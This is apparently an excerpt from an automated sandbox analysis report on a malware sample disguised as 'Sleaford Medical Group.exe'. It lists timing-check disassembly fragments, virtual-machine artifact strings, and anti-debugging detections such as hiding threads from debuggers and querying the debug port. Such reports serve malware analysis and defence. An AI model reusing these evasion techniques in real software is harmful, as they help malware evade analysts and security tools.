      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000425F57 second address: 0000000000425F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F08D0B1225Ch 0x0000001d popad 0x0000001e call 00007F08D0B11DEBh 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 00000000004205B7 second address: 00000000004253F5 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007F08D093BC3Bh 0x00000010 call 00007F08D093402Ah 0x00000015 jmp 00007F08D0937E4Ah 0x00000017 cmp ebx, edx 0x00000019 pop ecx 0x0000001a mov dword ptr [ebp+18h], ecx 0x0000001d cmp dh, dh 0x0000001f mov eax, 00000539h 0x00000024 mov edx, 60AF076Dh 0x00000029 call 00007F08D093CBCDh 0x0000002e jmp 00007F08D0937E4Ah 0x00000030 nop 0x00000031 push esi 0x00000032 push edx 0x00000033 jmp 00007F08D0937E4Ah 0x00000035 test ch, ch 0x00000037 push ecx 0x00000038 cmp eax, 00000539h 0x0000003d jne 00007F08D0937F88h 0x00000043 jmp 00007F08D0937E4Ah 0x00000045 pushad 0x00000046 mov edx, 000000C2h 0x0000004b rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000424202 second address: 0000000000424202 instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000565F57 second address: 0000000000565F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F08D09383DCh 0x0000001d popad 0x0000001e call 00007F08D0937F6Bh 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 00000000005605B7 second address: 00000000005653F5 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007F08D0B15ABBh 0x00000010 call 00007F08D0B0DEAAh 0x00000015 jmp 00007F08D0B11CCAh 0x00000017 cmp ebx, edx 0x00000019 pop ecx 0x0000001a mov dword ptr [ebp+18h], ecx 0x0000001d cmp dh, dh 0x0000001f mov eax, 00000539h 0x00000024 mov edx, 60AF076Dh 0x00000029 call 00007F08D0B16A4Dh 0x0000002e jmp 00007F08D0B11CCAh 0x00000030 nop 0x00000031 push esi 0x00000032 push edx 0x00000033 jmp 00007F08D0B11CCAh 0x00000035 test ch, ch 0x00000037 push ecx 0x00000038 cmp eax, 00000539h 0x0000003d jne 00007F08D0B11E08h 0x00000043 jmp 00007F08D0B11CCAh 0x00000045 pushad 0x00000046 mov edx, 000000C2h 0x0000004b rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000560F5E second address: 0000000000560F5E instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000565BB0 second address: 00000000005639A3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a retn 0010h 0x0000000d cmp edx, edx 0x0000000f push dword ptr [ebp+000000B4h] 0x00000015 pop dword ptr [ebp+00000134h] 0x0000001b jmp 00007F08D0B11CCAh 0x0000001d jmp 00007F08D0B11D00h 0x0000001f push dword ptr [ebp+68h] 0x00000022 push dword ptr [ebp+00000134h] 0x00000028 call 00007F08D0B142D5h 0x0000002d pushad 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 00000000005639A3 second address: 00000000005639A3 instructions:
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000563C6D second address: 0000000000563CC2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push esi 0x0000000b mov esi, CDC9E0AFh 0x00000010 cmp esi, CDC9E0AFh 0x00000016 jne 00007F08D0B0E6FEh 0x0000001c pop esi 0x0000001d mov eax, ebp 0x0000001f add eax, 000000F0h 0x00000024 jmp 00007F08D0B11CCAh 0x00000026 test cx, cx 0x00000029 mov ebx, dword ptr [ebp+000000E4h] 0x0000002f cmp edx, edx 0x00000031 mov ecx, dword ptr [ebp+000000F4h] 0x00000037 pushad 0x00000038 mov ecx, 000000EBh 0x0000003d rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exeRDTSC instruction interceptor: First address: 0000000000401C79 second address: 0000000000401C79 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 2Dh 0x00000005 cmp ebx, 06h 0x00000008 cmp edi, 02EAFF40h 0x0000000e movd mm1, ebx 0x00000011 movd mm1, ebx 0x00000014 paddusw xmm0, xmm3 0x00000018 fdivp st(6), st(0) 0x0000001a jmp 00007F08D0937E89h 0x0000001c movd mm1, ebx 0x0000001f movd mm1, ebx 0x00000022 jne 00007F08D0937D4Fh 0x00000028 inc edi 0x00000029 pslld mm5, 09h 0x0000002d fsubp st(1), st(0) 0x0000002f jmp 00007F08D0937E89h 0x00000031 cmp eax, 1Dh 0x00000034 cmp eax, 000000A3h 0x00000039 rdtsc
      Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002EC98E4 second address: 0000000002EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002EC9B5E second address: 0000000002EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00401C31 rdtsc
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\explorer.exe TID: 7004Thread sleep time: -46000s >= -30000s
      Source: C:\Windows\SysWOW64\help.exe TID: 6336Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000018.00000000.523858105.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000018.00000000.512900592.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000018.00000000.524127788.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000018.00000000.512927052.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Sleaford Medical Group.exe, oversad.exe, 0000001A.00000002.730357636.0000000000420000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`g
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000018.00000000.524783667.00000000089C9000.00000004.00000001.sdmpBinary or memory string: qeMusic
      Source: explorer.exe, 00000018.00000000.523652219.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 0_2_00401C31 rdtsc
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D967A LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E44FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E460EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4146A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E394F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E394F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E451C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E46740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4514FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E443D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3A3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E468D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E41A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E416DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E392D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E448DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4605AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4605AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E45EA55 mov eax, dword ptr fs:[00000030h]
